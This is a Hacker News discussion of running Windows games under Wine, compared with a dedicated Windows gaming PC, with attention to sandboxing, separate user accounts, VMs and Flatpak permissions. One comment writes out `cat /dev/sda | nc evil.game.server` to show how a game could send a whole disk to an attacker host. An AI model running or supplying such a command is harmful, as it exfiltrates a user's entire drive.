Lutris, PlayOnLinux, Proton, etc. are all really cool. But, if you value your time and security, just keep a dedicated Windows system for gaming. I keep all the things I actually care about or don't want stolen on my Linux system with full drive encryption and I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.
The small price I pay for having to manually type a Steam authentication code from my phone into the gaming PC is worth it to never have to worry about the insane level of insecurity and bugs from the gaming sphere. The amount of RCE in gaming is pretty bad. And, you know, sometimes your friends message you and want to play a game that is new and from a developer nobody can really trust.
Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content and IMO you would be irresponsible to keep your important documents/credentials on a system that is also used for gaming.
This makes no sense. So you value your security but then choose to go with a less secure operating system?
You can easily install all your games on another user on your linux box and run as that user. Super easy and it won't have access to any of your main home directory files. In fact with this configuration it's a lot easier to ensure that the games are sandboxed away from anything important.
In contrast on Windows most games run as Admin or at some point ask for admin privileges.
Running games on Linux is not about security or time savings. It's about control. It's about being able to sit down and play your game without Windows having a hissy fit about Windows updates. It's about being able to just play without worrying that some bad patch from Microsoft will hose your entire setup. And it's about finally wrestling control over gaming away from a company that cares more about taking your money than actually letting you play games you already have.
And the more people we get running Linux for gaming the better everyone will be better off for it.
Having an insecure os (not that I'd say that Windows is one) on a machine that does nothing else but gaming is still more secure than doing everything on the same machine.
Usually this is a UAC prompt so that the installer can deploy the game/app into Program Files. This isn't the fault of Windows and I'm fairly certain this could be avoided by the developer of the game/app.
> play your game without Windows having a hissy fit about Windows updates
You know you can defer updates and the nag? But then if you value your security then you'd install these updates (I lifted this from the start of your comment).
> without worrying that some bad patch from Microsoft will hose your entire setup
These are fairly rare, and personally never had it happen. I've hosed my Fedora install because the package manager really ballsed things up. But that was also a rare event.
I run both Windows and Linux and feel I'm in happily in control of both OS's.
> You really don't have to run interference for Microsoft
I beg your pardon? I think you need to re-acquaint yourself with the HN Guidelines:
"Please don't post insinuations about astroturfing, shilling, bots, brigading, foreign agents and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email hn@ycombinator.com and we'll look at the data."
> Consider that games and accounts themselves are a high value target. Your League or WoW account alone can be worth hundreds to thousands and then some. Putting all your gaming eggs in one basket, so to speak, isn't that great.
I think even you can see the flaw in your argument there. It's the accounts that are at risk and it doesn't matter which platform you're using. A determined miscreant will get control and it doesn't matter a hoot whether you were running Windows, Linux, MacOS etc.
No I think it makes some sense. You’re thinking in absolute terms. If you know everything and do everything right, your description may be better. But if you don’t want to be so careful all the time, wanting to be relax and not need to think about security implications all the time, the setup above is quite good.
I carry out a similar mentality, I don’t trust Windows and hence I run things I don’t trust on Windows as well. Eg I only install Zoom native app on Windows but not on any other desktop OSes. Use windows like it is a public machine, and you’ll have nothing to lose. (It is just an analogy, not to mean an exact statement, because you always has something to lose… just minimally here.)
> This makes no sense. So you value your security but then choose to go with a less secure operating system? You can easily install all your games on another user on your linux box and run as that user. Super easy and it won't have access to any of your main home directory files. In fact with this configuration it's a lot easier to ensure that the games are sandboxed away from anything important. In contrast on Windows most games run as Admin or at some point ask for admin privileges.
Reminds me of https://xkcd.com/1200/ ; why would running games as admin matter in the slightest if your actually sensitive data, ~/Documents, is not even on that computer ? If it were on linux with another user, the game could still do `cat /dev/sda | nc evil.game.server` unlike here.
And of course a very easy to exploit bug that has been around for like 12 years hasn't gone public a few days ago because LPEs DO NOT EXIST IN LINUX.
I mean, it's quite obvious, exploitable bugs do not exist in Linux because back in the day Ken, Dennis, Brian, Doug and Joe agreed that they were not part of the Unix philosophy so they left them for windows to implement. /s
Aside from the stupid joke, what OP is saying is absolutely right, if you care about security keep your things properly isolated, keep a (whichever OS you trust but hopefully linux or a bsd) as main box and then a windows or macos computer isolated (best case scenario using a vlan capable switch, or a dedicated pi that acts as a firewall just for that box).
> You can easily install all your games on another user on your linux box and run as that user. Super easy and it won't have access to any of your main home directory files. In fact with this configuration it's a lot easier to ensure that the games are sandboxed away from anything important.
I have been told enough times that existence of RCE should be assumed as root access, because someone who can do RCE could probably do a PE too..
I game on linux, it's not as secure as I would like it to be. I run everything under unprivileged container including steam, the problem is that for vulkan hardware renderer to work it requires direct access to the device and the linux kernel doesn't virtualize device access. It's a security nightmare as far as I can see.
One issue with device virtualization is that the required hardware features are often locked out in non enterprise-grade hardware (although they can sometime be unlocked, for example: https://github.com/DualCoder/vgpu_unlock).
thank you for that link. Does AMD have the same shenanigans of locking out consumer grade gpu's? Intel has GVT-g vGPU virtualization which works with intel integrated graphics, it will be interesting to see what road Intel takes with their dedicated GPUs.
Unfortunately, it seems that GVT-g is dead going forward. The word is it's not coming to the latest iGPUs and they plan to "replace is with SR-IOV" which isn't the same thing and I haven't even heard of anyone getting it to work anyway.
Really stinks because I was super interested in a GVT-g on their new discrete cards.
I might be misinformed, but my understanding is that consumer AMD cards, for the most part, do not have the required virtualization hardware at all, so there is nothing to unlock.
With PC gaming it's more of an issue of having to install all sorts of various software, including game mods, or the ever popular "hey try out my game" scams through discord. A popular one is distributing malicious unity assets. We don't realize that most of this stuff has little to no security, simply put just nobody exploits it. Dark souls series all had an online RCE and the game servers have been down for a while. I do not trust any of that near my dev environment. I've found a great separation is a PC with dual boot and a laptop with only Linux.
A RCE in Windows software running on WINE wouldn’t have much benefit on Linux unless the attacker specifically knew said software was running in WINE.
1. WINE et al run in a sandboxed environment. You cannot execute other Linux software without then also finding an RCE in WINE. So that’s multiple RCEs needed in multiple points of the stack and the attacker needs to be aware that you’re running the uncommon set up of that Windows software running in WINE.
2. The amount of Windows software installed in WINE is limited. So you don’t have a large attack surface of Windows software. That not only limits the amount an attacker can do in the sandbox but also limits the surface area that further RCEs might exist
3. Even if you could escape WINE you’re then stuck with the problem that you don’t know what the host OS is. So you’re stuck with generalised POSIX or GNU. Which might still be common but far far less common than going after Windows users.
> 1. WINE et al run in a sandboxed environment. You cannot execute other Linux software without then also finding an RCE in WINE. So that’s multiple RCEs needed in multiple points of the stack and the attacker needs to be aware that you’re running the uncommon set up of that Windows software running in WINE.
Are you sure about this? I was the impression that there's nothing preventing an .exe running under Wine from just issuing Linux syscalls, eg. execve.
EDIT: I just tested this, and indeed there doesn't seem to be any sandboxing:
Not only there isn't any sandboxing, the lack of it is how WINE works - wine's low-level dlls (kernel32.dll for example) just call out to linux libs, or syscall directly.
Keep in mind that the Souls RCE exploit was unknown for many years, and the modding community rallied to get it to FromSoft's attention.
The modding community maintains its own 'anti-cheat' system called Blue Sentinel, which was updated day-of to block the RCE exploit. At least, the same day the warning was made in the Discord servers I'm still in.
Not really because it requires very esoteric configurations to avoid other users reading important files of yours. Unless you're willing to modify your default SSH (and other, apache, etc.) configurations out-of-the-box setup will leave all your data readable by other users.
In the linux world it's standard operating procedure to make a separate user/group for every service and ensure the file system is cognizant of that. And the default in ubuntu runs mysql with mysql user and nginx / apache with www-data as a user.
That's correct, but if you want to keep any files that services like that access, such as SSH keys/authorized_keys you need to give them access to your directories. Because of this you can't make your home directory only readable by your user, since then sshd cannot access `~/.ssh` to check your authorized_keys file. The same is true for running a web server in `~/public_html` and anything else.
The agreed upon solution to this is to make the home directory readable, then split the files into a `~/public` and `~/private` directory, which is well accepted in the server space but completely non-adopted and not straightforward in the desktop space. It's technically possible to modify your $XDG_DATA_DIR and other similar configurations, but many programs and tools still don't care and will only look for and operate on configuration files in `~/.config` or `~/.local` or worse yet just `~/.foo`.
This is the approach I use. Aside from my main account, I have a separate account Steam, a separate account for Wine applications and another account for miscellaneous applications. I have an iptables rule that I use to selectively disable network traffic from applications I don't want/expect to communicate with the outside world and disable cron and atd to reduce the avenues for persistent applications.
> Lutris, PlayOnLinux, Proton, etc. are all really cool. But, if you value your time and security, just keep a dedicated Windows system for gaming. I keep all the things I actually care about or don't want stolen on my Linux system with full drive encryption and I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.
I agree with the part about running a dedicated system for gaming. I do the same but for creating music (I am not gaming).
On the other hand you don't need to do that on Windows so these tools still are useful.
I will add that if you have network segregation and firewalling between your main computer, your dedicated setup (gaming, whatever....) and the potential iot things running in your house it is even better.
> I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.
This was my plan too, but my intention was to keep the windows box offline 99% of the time (pretty much only connecting for downloads/installs). I still didn't like the idea of installing steam on the machine though since that would mean it's got my personal info on it and I'd be making purchases on it.
Now that steam thinks they can get a large number of games running on their Linux-based handheld shouldn't that mean most games should work on a linux desktop without much trouble? I'm hoping this means I can avoid windows 10/11 entirely.
Most games already do run with little or no problems. I recommend looking up games you are interested in on https://protondb.com to see how well you can expect them to run with Proton.
ProtonDB is really cool and I have been a big supporter (and contributor) over the last few years. The problem (and what you'll see if you look closer at the database) is that we have this giant elephant in the room in the Linux community named Nvidia. What works for an Intel/AMD GPU user may not work for an Nvidia user and the level of bugs associated with Nvidia on Linux is obscene. It sucks, and yeah, just buy AMD cards, but the reality is that Nvidia dominates the GPU space right now significantly and their cards seem to be a few generates ahead of AMD still.
Just a while ago for a CTF we implemented some hash breaking algorithms in OpenCL and CUDA and members of our team ran them on their own hardware. Firstly, we did it in Windows despite otherwise doing everything in Linux because the OpenCL/CUDA support and speed was leaps and bounds ahead on Windows. Next we compared the performance of hashes per second and it was orders of magnitude worse on AMD cards. We tweaked the algorithm a bit here and there to favor the AMD card and saw some minor gains, but overall we're talking a difference of 15/s versus 200/s in terms of how many hashes it was breaking per second.
> and if you're concerned about performance, use PCIe passthrough for your graphics card.
Won't work with NVIDIA cards at all without a boatload of hacks (because they don't want consumer cards to be used in virtualized environments), and AMD cards are an utter pain in the ass to work with because AMD can't be bothered to get basic PCI stuff to work [1].
Also, you always run the risk of some anti-cheat solution detecting your virtualization environment and banning you permanently.
If you value your sanity, don't do gaming inside a VM.
Nvidia recently removed the driver check on consumer cards making them the clear choice now.
I've actually had good luck with AMD cards, but the reset bug is truly bizarre. For instance I own an evga R7 360, no reset bug, very reliable. I had also purchased an XFX R7 360, never survived a reboot! My sapphire RX 470 also works fine with no special actions from me and I've heard people have issues with that one.
You're definitely correct regarding anti-cheats though, they are something you have to watch out for.
I also keep my Windows gaming PC only for gaming. Reinstall it regularly, because this is the Windows way.
I have a DisplayPort USB KVM switch to quickly switch monitor, headphones, mouse and keyboard between my mac mini (that I normally use) and the gaming PC.
Win 7 and 10 have frequently ran into issues where updates fail to install for goofy and often inexplicable reasons. It is easier and faster to just reinstall that garbage without wasting time troubleshooting.
This is exactly what I am doing (I also have my Win box on a walled off segment of my network). It does seem silly that my most powerful computer is a one-trick-pony, but I run my most demanding apps on Mac...
I've thought about doing something like this before, does your windows machine have its own keyboard, mouse and monitors or do you have some kind of switch involved? I haven't worked out a good way yet of using multiple monitors over two machines whilst sharing audio and input between the two
I have a USB switch, my keyboard and mouse go into the USB hub on my monitor, and that hub is switched between my laptop dock and my windows pc. The monitor input is changed on the monitor. A proper KVM would be easier but is also many times more expensive.
I use my laptop open though, so I can still control it when using the windows pc.
For audio, I use a simple 3.5mm splitter. They work in both directions, so with the right combination of male/female 3.5mm cables you can merge the audio for about $10. There are fancier audiophile solutions too.
Something like synergy (from symless, there are competitors and FOSS alternatives but I can’t remember their names) might be good for your use case, to carry over m/kb input to the non-windows machine.
Bunch of different options. I actually couldn't tell the difference in latency from through a monitor when I just used steam in home streaming / remote play as steam in box streaming / not really remote play.
I'd say in order of seamlessness:
KVM switch or monitor input switch
Looking-glass
parsec, steam in home streaming
I have a KVM switch as well but I kind of prefer to run things in a window.
There's a couple quality of life things about running windows in a VM as well. When it goes on it's update parade I can just close the window and ignore it. And with snapshotting a bad update can just be rolled back.
I have windows machine under the desk with no screen, keyboard etc. I connect remotely to windows via https://parsec.app/ it is super fast, it needs like 20ms via Ethernet (https://www.youtube.com/watch?v=DksBBlHzulY). As long you are no cs-pRogAMer you will be just fine and can access your full windows environment without the hardware hassle. The fullscreen encoding quality in H.256 is also pretty decent.
It also works via Internet out of the box with any shitty office notebook ;)
if you're competitive and want low latency/high framerate: you can do all of this with a single cheap USB physical switch (about $2 on ali express), plus DDC to switch monitor inputs automatically
I have this hooked up, so that I push the switch and the monitor inputs automatically switch
I also have a (cheap) physical audio mixer to do the audio, but you can do the same thing with pulseaudio and a line-in cable from one computer to another
The security concern is very very valid. It is surprising how well wine&co run windows malware considering that they were (probably) never specifically meant nor tested for that.
> if you value your time and security, just keep a dedicated Windows system for gaming
Not everyone has the space and money for this. In fact most people don't and when you buy a powerful PC for games you most likely also want to use it for your other PC tasks too - especially if you are a developer. Even if one has both the space and money, they may just not want to "task switch" between different machines (e.g. i do have a bunch of computers in my place but 99% of the time i use just one). Also switching between games and work in a different virtual desktop or whatever is way faster and more convenient than even rolling your chair to some other desk to another PC.
> I keep all the things I actually care about or don't want stolen on my Linux system with full drive encryption and I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.
Neat, but the same applies if you are running games under Wine since everything is running under Linux and not Windows. You do not even need to have Windows installed. If you are too paranoid to even touch an EXE because it might access other stuff in your home directory you can run the games under a different user with access only to that user's files.
> worry about the insane level of insecurity and bugs from the gaming sphere. The amount of RCE in gaming is pretty bad.And, you know, sometimes your friends message you and want to play a game that is new and from a developer nobody can really trust.
If you do not trust a developer it is much easier and safer to not download and run the game. If there is any issue with the game, it'll be quickly figured out. It is not any different than a game targeting Linux or really any other piece of software.
> Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content and IMO you would be irresponsible to keep your important documents/credentials on a system that is also used for gaming.
This is what pretty much EVERY software - game related or not - for pretty much EVERY OS that has some form of automatic updates does! Singling out Windows games is a bit of a double standard when your browser could be updated right tomorrow with a brand new bug that enables sites to access your SSH keys (AFAIK this has actually happened with Firefox on Linux).
If anything, at least if you are playing singleplayer games, it is much easier to keep games to a known well working version when you stick with DRM-free games like those you can buy from GOG, Zoom Platform, GamersGate (not all are DRM-free there but there is a filter), Humble Bundle (similar case, not all are DRM-free), etc instead of Steam.
Though even if you stick with Steam, i doubt Valve (or any other game store) wants to distribute actual malware from their service and things will either be fixed or removed.
If you don't have the money or space what you can do is just have 2 hard drives, one fully encrypted running whichever OS you want and one with windows.
Unplugging the secure one when booting into the insecure one would be ideal but not required.
In this case you'd still be vulnerable to certain EFI based attacks but at least you'd be safe from most common crooks.
I mean, seriously, running stuff with wine is OK if your expectatives are aligned with reality which is, you're running stuff there.
If you complain about wine but then are completely fine with the typical 'curl XXX | bash" well, yeah, you're SoL but other than that some degree of separation is good.
I don't think there is a point on doing that, Windows isn't even running if you dual boot, why bother having 2 hard drives? Just place Windows in another partition.
But the point is to get rid of Windows completely without giving up the ability to play Windows games.
They point of having 2 drives is being able to better isolate your secure system.
If you physically unplug your secure drive then you know for sure that no fun stuff is going on behind your back.
I'm not entirely sure about secure boot when it comes to validating the boot loader of an installed system so I can't vouch for that but I do know that UEFI kits aside, unless you have a proper way to validate the secure systems boot loader it could be tampered with if the disk is accessible by a compromised system.
IMO the point is not to get rid of windows but to isolate whichever insecure system you use in a way in which it can't hurt the secure system (it could even be a secondary Linux system where you use Wine if that's what you want)
The problem with consoles is that your games library is basically hostage to the platform and the excessive DRM they have. With PC games you can play the games on any PC, current or future and especially if you stick with DRM-free games you can play the games years or even decades after they were out.
If you only care about playing a game now and then without caring what might happen in 4-5 years consoles might be ok, but i think that everyone eventually will find a game they'd like to be able to re/play 10+ years later on their current hardware and consoles make that hard.
I recently picked up a PS3 and it seems like in almost every game I play, even though by now most of those games are as patched as they're ever going to be, I keep finding bugs that could have been worked around if I'd been playing the PC version. If simple console commands (which so far have never been accessible on the PS3) couldn't solve the problem, often there's a mod someone wrote that would have. I guess the PS4 has a limited ability to use mods at least, so maybe that's improved the situation a little, but it's made me consider ditching playing anything on a console if PC is an option.
I'd have to say the console experience (circa 2013) is not at all without headaches.
This. Many moons ago I used to play on PC and had an extra SSD with Windows exclusively for that purpose. 4-5 years ago I decided to buy a XBOX and man, I've been so happy since then: Turn on and play, no having to mess with graphics configuration, no installations, no graphic card updates etc. I have to mention that I am casual gamer. Perhaps for a person who is really into gaming a PC provides more flexibility but that's not for me. PC for working and console for gaming.
More fitting title would be "Easily manage wineprefix using environments" or "Easily manage wine prefixes in a new way" as this is just using Wine, which is what actually does the "Run Windows software and games on Linux" (current title) part.
If anyone has experience, and since the repository doesn't mention it, how is Bottles different from let's say Lutris, Q4Wine and PlayOnLinux that already exists and does something similar?
Further to the point, I would hazard that the majority of linux users don't use wine because its too complex to justify the effort. Very few users for this want to know how they would configure wine to do the same thing, they just want to 'run windows software and games on linux'.
I do the opposite, but for the exact same reason. I couldn't figure out how to use Lutris at all when I first installed Linux, but I happened upon a very detailed guide for setting up a wine prefix (it's just a folder) for the game I was installing. Now when I install a new game I mostly just scroll back through my shell history to see what I did back then.
I just opened Lutris for the first time since then and I think I can see how to use it now. But I'll probably stick to my current ways because it works and really all of it's a pain anyway. Lutris is still invaluable for peeking through the installer scripts, though.
I feel like if this were targeted at everyone it would link to the marketing website or an article rather than the Github process. A bit of technical knowledge is a fair expectation for the Linux Hacker News audience.
I find the lutris is actually a pretty excellent experience. Most games have a method to install themselves with it, it integrates nicely with my gog library, and it really does just work. You can edit the prefix dosdevices to deny access to the filesystem outside of the prefix.
I always disliked the concept of bottles as offered by CrossOver and probably the alternatives. I strongly prefer to have a single Windows subsystem with all the relevant DLLs installed and well-integrated with my Linux environment. Perhaps I never tried any particularly weird Windows apps/games but having them all in just one well-tweaked default "wineprefix" never caused a problem for me - apparently they don't conflict so unnecessary isolation means just unnecessary duplication of files and effort.
I use wine every single day, but never for gaming. I'm a 100% Linux user for over 15 years, but I have to admit that beyond the system config, package management and desktop (XFCE), I find Linux native apps on the desktop to be crap. Nothing in music land can touch MusicBee or mp3tag.de. I also just tried to rip a bunch of audio CDs and the default (and most recommended) ripper, 'Asunder', doesn't handle disc numbers. Seriously. EasyTag is anything but easy. It's like the developers never used any of the decent software available since the 90s on other platforms. So wine is a godsend, even if it is impossible to update without breaking a whole wine prefix. These days I bundle the wine version and the prefix together and don't bother upgrading them because it's just too brittle.
This is a strange HN post (the parent, not yours). I recall playing with bottles and prefixes ... 10 years ago I think? Back when I was in my emulation craze and wanted to setup a huge swathe of games with WINE.
If you intend to use this, reach for the AppImage version. The AUR installation script appears to be broken, and the Flatpak version of the app is feature-incomplete (and, yunno, a Flatpak).
Parent is right though: Flatpak version doesn't allow the creation of .desktop files for Windows applications. It's a mysteriously silly decision, as you don't even get the option even if you manually give the flatpak the correct permissions.
Even worse: a bug in the Flatpak version prevents the launching of Windows applications directly from the commandline, so you can't even manually create .desktop files for it!
The main challenges I have had with Flatpak is that for any apps that need to integrate with other components (e.g. I want my VS Code to use the same Node that I run from the Terminal) things get flaky. Its not so much that Flatpak does not support that kind of integration, but that many apps are not properly configured when packaged to take advantage of FP's integration features.... End result is still a poor user experience. Moral of the story: don't just shove your code in a Flatpak and call it a day! Take the time to do it right.
Gnome has a built in method that allows you to set your own permissions on where in the filesystem a Flatpak can access, in addition to more fine-grained control like Flatseal. For most programs this means limiting it's access to your Download directory or similar until portals become more widely adopted. There are also wrapper scripts you can use for when you double click a file it will temporarily give access to the file to VLC and revoke it afterwards - basically a poor man's portal.
Also you should look closer at what "your entire filesystem" means. There are a lot of areas of the file system that are completely blacklisted with no actual way to enable them regardless of configuration. Important things like /etc and /usr just to name a few.
The small price I pay for having to manually type a Steam authentication code from my phone into the gaming PC is worth it to never have to worry about the insane level of insecurity and bugs from the gaming sphere. The amount of RCE in gaming is pretty bad. And, you know, sometimes your friends message you and want to play a game that is new and from a developer nobody can really trust.
Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content and IMO you would be irresponsible to keep your important documents/credentials on a system that is also used for gaming.